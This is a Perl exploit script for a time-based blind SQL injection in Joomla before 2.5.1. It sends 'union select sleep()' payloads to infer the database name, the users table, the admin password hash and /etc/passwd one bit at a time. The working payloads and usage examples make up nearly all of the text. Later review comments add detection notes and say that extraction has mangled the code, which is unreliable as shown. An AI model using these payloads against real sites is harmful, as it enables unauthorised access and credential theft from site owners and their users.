#! /Usr/bin/perl
# Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf () unsec.net>
# Www.securitybydefault.com
# Joomla <2.5.1 time-based SQL injection; vulnerability found by Colin Wong
#
# Uses sleep() rather than benchmark(); change this for MySQL < 5.0.12
#
#1.-Database name: database ()
#2.-Users data table name: (replace 'joomla' with the database () result)
# Select table_name from information_schema.tables where table_schema = "joomla" and table_name like "% _ users"
#3.-Admin password: (replace zzzz_users with the table name returned by the previous SQL query)
# Select password from zzzz_users limit 1
# NOTE(review): this listing is case- and whitespace-mangled by extraction
# ("Use strict;", "$ url", "LWP: UserAgent", "$ | = 1;"). It is kept verbatim
# below and does not run as shown; the comments describe what the script is
# intended to do so a defender can recognise and detect the technique.
Use strict;
Use LWP: UserAgent;
# Intended: $| = 1, i.e. unbuffered STDOUT so each recovered byte prints at once.
$ | = 1;
# Positional arguments: target base URL, per-probe delay in seconds, and the
# SQL expression whose result is to be inferred from response timing.
My $ url = $ ARGV [0];
My $ wtime = $ ARGV [1];
My $ SQL = $ ARGV [2];
Unless ($ ARGV [2]) {
Print "$0 <url> <wait time> <SQL> \ n ";
Print "\ texamples: \ n ";
Print "\ t get admin password: \ n ";
Print "\ t $0 http: // host/joomla/3 'database () '\ n ";
Print "\ t $0 http: // host/joomla/3 'select table_name from information_schema.tables where table_schema = \ "joomla \" and table_name like \ "% 25_users \" \ '\ n ";
Print "\ t $0 http: // www.2cto.com/joomla/3 'select password from zzzz_users limit 1' \ n ";
Print "\ t get file/etc/passwd \ n ";
Print "\ t $0 http: // host/joomla/3 'Load _ file (\"/etc/passwd \ ") '\ n ";
Exit 1;
}
# $len is written by sub len() below; $sqldata is declared but never used here.
My ($ len, $ sqldata );
My $ ua = LWP: UserAgent-> new;
# 60 s timeout: probes are expected to take baseline rtt + $wtime seconds.
$ Ua-> timeout (60 );
$ Ua-> env_proxy;
# Baseline: time one plain GET of the target so later delays can be compared
# against normal latency rather than an absolute threshold.
My $ stime = time ();
My $ res = $ ua-> get ($ url );
My $ etime = time ();
My $ regrtt = $ etime-$ stime;
Print "rtt: $ regrtt secs \ n ";
Print "vuln? :";
# Vulnerability check: one request whose path carries "union select sleep(...)";
# the host is judged vulnerable only if the response is delayed by at least
# baseline + $wtime. Only wall-clock time is inspected, never the body.
# Detection note: the injected text sits in the request path of a 404-style
# URL, so web-server / WAF logs show a single request with "union select
# sleep(" in the path followed by a burst of similar requests with consistent
# multi-second latency. The page states Joomla <2.5.1 is affected; upgrading
# past that release removes the injection point.
My $ sleep = $ regrtt + $ wtime;
$ Stime = time ();
$ Res = $ ua-> get ($ url. "/index. php/404 'union select sleep ($ sleep) union select '1 ");
$ Etime = time ();
My $ rtt = $ etime-$ stime;
If ($ rtt> = $ regrtt + $ wtime) {print "OK! \ N ";}else {print" nope :( \ n "; exit 1 ;}
# Number of decimal digits in length($SQL); filled in by sub len().
My $ lenoflen;
# len($sql): infer length($sql) on the server one decimal digit at a time.
# Reads the file-level globals $ua, $url, $regrtt, $wtime, $stime, $etime,
# $lenoflen and appends each recovered digit to the file-level $len.
# Returns $len (a string of digits). Each probe is judged solely by whether
# the response took at least $regrtt + $wtime seconds.
# NOTE(review): the listing is extraction-mangled ("Sub len", "$ _ [0]",
# "=_ _"); code is kept verbatim.
Sub len {
# Length of length
# Step 1: find how many digits the length has (1..5) by testing
# length($sql) = 1, 2, ... and stopping at the first delayed response.
For (1 .. 5 ){
My $ SQL =$ _ [0];
$ Stime = time ();
$ Res = $ ua-> get ($ url. "/index. php/404 'Union select if (length ($ SQL) =$ _, sleep ($ wtime), null) union select '1 ");
$ Etime = time ();
My $ rtt = $ etime-$ stime;
If ($ rtt> = $ regrtt + $ wtime ){
$ Lenoflen = $ _;
Last;
}
}
# Step 2: for each digit position $ll (1..$lenoflen) test the values 0..9
# with mid(length(...), $ll, 1); a delayed response means that digit matched.
# A network hiccup that slows an unrelated probe is indistinguishable from a
# match here, so a single delayed response can append a wrong digit.
For (1 .. $ lenoflen ){
My $ ll;
$ Ll = $ _;
For (0 .. 9 ){
My $ SQL =$ _ [0];
$ Stime = time ();
$ Res = $ ua-> get ($ url. "/index. php/404 'Union select if (mid (length ($ SQL), $ ll, 1) =_ _, sleep ($ wtime), null) union select '1 ");
$ Etime = time ();
My $ rtt = $ etime-$ stime;
If ($ rtt> = $ regrtt + $ wtime ){
# Appends to the file-level $len declared at top level, not a local.
$ Len. = $ _;
}
}
}
Return $ len;
}
# data($sql, $len): recover the result of $sql one byte at a time and print it
# to STDOUT as it is decoded. For each character position 1..$len it issues
# eight timing probes, one per bit mask 1,2,4,...,128, testing
# ord(mid(...)) & $bit; a delayed response means the bit is 0, otherwise 1.
# Bits are stored MSB-first in @byte (index 1 = mask 128 ... index 8 = mask 1,
# index 0 is the empty string) and emitted with pack("B*").
# Cost: 8 requests per byte, each lasting about $regrtt + $wtime seconds, which
# is the volume/latency pattern a defender would see in access logs.
# NOTE(review): "$ Height = 128" is declared but the loop condition reads
# "$ high"; under strict that would not compile, so this looks like an
# extraction artifact rather than intended logic — kept verbatim.
Sub data {
My $ SQL =$ _ [0];
My $ len = $ _ [1];
My ($ bit, $ str, @ byte );
My $ Height = 128;
For (1 .. $ len ){
# $c counts down from 8 so the first (low) mask lands at the highest index.
My $ c = 8;
@ Byte = "";
My $ a =$ _;
For ($ bit = 1; $ bit <= $ high; $ bit * = 2 ){
$ Stime = time ();
# Select if (ord (mid (load_file ("/etc/passwd"),) & 64) = 0, sleep (2), null) union select '1 ';
$ Res = $ ua-> get ($ url. "/index. php/404 'Union select if (ord (mid ($ SQL), $ a, 1) & $ bit) = 0, sleep ($ wtime), null) union select '1 ");
$ Etime = time ();
My $ rtt = $ etime-$ stime;
# Delay => (byte & $bit) == 0 => bit is "0"; no delay => bit is "1".
If ($ rtt> = $ regrtt + $ wtime ){
$ Byte [$ c] = "0 ";
} Else {$ byte [$ c] = "1 ";}
$ C --;
}
# Join the eight bit strings and print the decoded character immediately.
$ Str = join ("", @ byte );
Print pack ("B *", "$ str ");
}
}
# Main flow: first infer the length of the SQL result, then decode its bytes.
# Nothing is printed for the data until data() starts emitting characters.
$ Len = len ($ SQL );
Print "$ SQL length: $ len \ n ";
Print "$ SQL data: \ n ";
Data ($ SQL, $ len );